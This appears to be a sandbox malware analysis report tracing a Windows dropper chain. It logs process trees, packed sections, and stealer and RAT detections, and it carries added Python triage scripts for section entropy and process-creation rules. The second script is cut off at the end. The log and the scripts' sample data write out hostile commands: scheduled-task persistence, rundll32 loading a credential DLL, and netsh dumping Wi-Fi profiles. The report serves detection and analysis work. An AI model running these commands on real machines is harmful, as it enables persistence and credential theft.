Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0080AEC0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00803ED0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007FDF60
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008B40A0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008A20C0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007F2100
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00811130
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007A7190
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008B3160
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007B035F
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00860350
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0079F570
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007C47AD
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007AC950
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007AA918
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007BDA74
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008B4AE0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00854B90
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00800BA0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007C8BA0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007C8E20
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00811E40
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0085BFC0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0085CFC0
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: String function: 000EF9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: String function: 000F0A30 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: String function: 000D9CB3 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: String function: 0078ACE0 appears 86 times
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
Source: alexxxxxxxx[1].exe.44.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: swiiiii[1].exe.44.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiiii.exe.44.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: alexxxxxxxx[1].exe.44.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9904153184604905
Source: file.exe | Static PE information: Section: wqkjverv ZLIB complexity 0.9948664563962207
Source: explorta.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9904153184604905
Source: explorta.exe.0.dr | Static PE information: Section: wqkjverv ZLIB complexity 0.9948664563962207
Source: amert[1].exe.2.dr | Static PE information: Section: ZLIB complexity 0.9970191976584022
Source: amert[1].exe.2.dr | Static PE information: Section: nkxbjlfg ZLIB complexity 0.994648871020736
Source: amert.exe.2.dr | Static PE information: Section: ZLIB complexity 0.9970191976584022
Source: amert.exe.2.dr | Static PE information: Section: nkxbjlfg ZLIB complexity 0.994648871020736
Source: chrosha.exe.26.dr | Static PE information: Section: ZLIB complexity 0.9970191976584022
Source: chrosha.exe.26.dr | Static PE information: Section: nkxbjlfg ZLIB complexity 0.994648871020736
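The "ZLIB complexity" entries above are the packed-section heuristic in the raw: a section whose bytes barely compress (ratio close to 1.0) and whose name is not one a linker emits (wqkjverv, nkxbjlfg) is almost always packed or encrypted payload that gets unpacked at run time, which matches the "Detected unpacking (changes PE section rights)" signature. The script below is an added example, not Joe Sandbox code: a stdlib-only PE section-table parser that computes the same compressed-size/raw-size ratio per section and flags incompressible sections with unconventional names. The PE it examines is constructed in memory by build_test_pe (a minimal, non-loadable PE32 layout mimicking the report's pattern); the 0.95 threshold and the KNOWN_SECTIONS list are assumptions of this example, not values from the report.

```python
"""Packed-section triage, keyed on the 'ZLIB complexity' values the report gives
for file.exe, explorta.exe and amert.exe (about 0.99 for sections named
wqkjverv / nkxbjlfg).  Added example, not Joe Sandbox code: a stdlib-only PE
section-table parser plus the compressibility ratio per section.  The PE handed
to it below is constructed in memory; it is not the analysed sample."""
import os
import struct
import zlib

# Section names a linker emits; anything else with an incompressible body is packer-like.
KNOWN_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".crt", ".textbss"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes


def zlib_complexity(data: bytes) -> float:
    """Compressed size / raw size.  Random or encrypted bytes give ~1.0 (or slightly above)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_sections(pe: bytes):
    """Walk the section table and yield (name, raw_offset, raw_size, characteristics)."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]    # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]       # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size     # signature (4) + file header (20) + optional header
    for i in range(num_sections):
        raw_name, _vsize, _va, raw_size, raw_off, _, _, _, _, chars = \
            struct.unpack_from(SECTION_HDR, pe, table + 40 * i)
        yield raw_name.rstrip(b"\0").decode("latin-1"), raw_off, raw_size, chars


def section_report(pe: bytes, threshold: float = 0.95):
    """Flag sections whose body barely compresses and whose name is not a conventional one."""
    findings = []
    for name, raw_off, raw_size, chars in parse_sections(pe):
        ratio = zlib_complexity(pe[raw_off:raw_off + raw_size])
        findings.append({
            "name": name,
            "raw_size": raw_size,
            "zlib": round(ratio, 4),
            "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "write": bool(chars & IMAGE_SCN_MEM_WRITE),
            # the name test isolates the random-name pattern; a .text at 0.99 still deserves a look
            "suspicious": ratio >= threshold and name.lower() not in KNOWN_SECTIONS,
        })
    return findings


def build_test_pe(sections, file_align=0x200):
    """Constructed fixture (assumption of this example): a minimal PE32 layout with DOS stub,
    headers, section table and raw section data.  Enough for section parsing, not loadable."""
    opt_size = 0xE0                                          # PE32 optional header size
    headers_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_start = -(-headers_len // file_align) * file_align   # round up to file alignment
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)     # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table, bodies, raw_off = b"", b"", raw_start
    for idx, (name, data, chars) in enumerate(sections):
        raw_size = -(-len(data) // file_align) * file_align
        table += struct.pack(SECTION_HDR, name.encode("ascii").ljust(8, b"\0"), len(data),
                             0x1000 * (idx + 1), raw_size, raw_off, 0, 0, 0, 0, chars)
        bodies += data.ljust(raw_size, b"\0")
        raw_off += raw_size
    image = (dos + b"PE\0\0" + file_hdr + opt_hdr + table).ljust(raw_start, b"\0")
    return image + bodies


def demo_pe() -> bytes:
    """Two sections: a compressible .text and an incompressible, writable, randomly named one."""
    return build_test_pe([
        (".text", b"\x55\x8b\xec\x83\xec\x10\x5d\xc3" * 384, 0x60000020),   # CODE|EXECUTE|READ
        ("wqkjverv", os.urandom(0x1000), 0xE0000020),                       # CODE|EXECUTE|READ|WRITE
    ])


if __name__ == "__main__":
    for finding in section_report(demo_pe()):
        print(finding)
```

Run against a real sample, the same loop over parse_sections(open(path, "rb").read()) reproduces the report's per-section ratio; a writable, executable, incompressible section with a random name is the triage signal, and the unnamed "Section: ZLIB complexity 0.99" entries above are the same pattern for a section whose name field is empty.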
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@134/170@0/32
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_001437B5 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_001310BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_001316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_001451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0015A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6188
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess12156
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12172:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:11920:64:WilError_03
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:8384:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:11880:64:WilError_03
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7556
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2584
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\5454e6f062
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: 2531414c80.exe, 00000008.00000002.2507039187.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2497729169.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000003.2207330993.0000000005310000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2531568064.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000003.2208478745.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000003.2274624155.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2403293492.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000001F.00000002.2448073874.0000000000D51000.00000040.00000001.01000000.00000010.sdmp, RageMP131.exe, 0000001F.00000003.2369468000.0000000005000000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 2531414c80.exe, 00000008.00000002.2507039187.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2497729169.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000003.2207330993.0000000005310000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2531568064.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000003.2208478745.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000003.2274624155.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2403293492.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000001F.00000002.2448073874.0000000000D51000.00000040.00000001.01000000.00000010.sdmp, RageMP131.exe, 0000001F.00000003.2369468000.0000000005000000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 2531414c80.exe, 00000008.00000003.2251127325.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300537130.0000000008430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300108474.0000000008423000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304669864.0000000008423000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2301424641.0000000008423000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2292643859.00000000079B7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2346102842.0000000007AAE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2290504477.00000000079B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorta.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorta.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2531414c80.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2531414c80.exe | String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Process created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Process created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown | Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown | Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Process created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown | Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Process created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WerFault.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
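The process tree above carries the whole chain in four command lines: 2531414c80.exe registering MPGPH131.exe from C:\ProgramData as scheduled tasks with /rl HIGHEST (the "Creates multiple autostart registry keys" and "New RUN Key Pointing to Suspicious Folder" side of the report), chrosha.exe handing cred64.dll in AppData\Roaming to rundll32 with the export Main, that rundll32 then running netsh wlan show profiles (the "Capture Wi-Fi password" Sigma hit), and swiiiii.exe starting RegAsm.exe with no assembly argument, which is the injection host the RedLine/zgRAT detections point at. The script below is an added example, not Joe Sandbox code, that turns those four observations into checks over process-creation records. The log lines are constructed to mirror the report's entries, with three benign look-alikes added; the pipe-separated parent/image/cmdline layout, the rule names and the interactive-shell and .NET-host lists are assumptions of this example rather than any product's schema.

```python
"""Process-creation triage for the chain the report lists: schtasks with /rl HIGHEST
pointing into C:\\ProgramData, rundll32 loading cred64.dll out of AppData\\Roaming,
'netsh wlan show profiles' under rundll32, and RegAsm.exe started from Temp with no
arguments.  Added example, not Joe Sandbox code.  The log lines are constructed
(pipe-separated parent/image/cmdline, mirroring the report); that layout and the
rule names are assumptions, not any product's schema."""
import ntpath
import re

USER_WRITABLE = re.compile(r"^[a-z]:\\(programdata|users\\[^\\]+\\appdata)\\", re.I)
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# Constructed sample: the report's chain plus three benign look-alikes (cmd.exe, svchost.exe, setup.exe).
LOG = r"""
parent=C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe|image=C:\Windows\SysWOW64\schtasks.exe|cmdline=schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
parent=C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe|image=C:\Windows\SysWOW64\rundll32.exe|cmdline="C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
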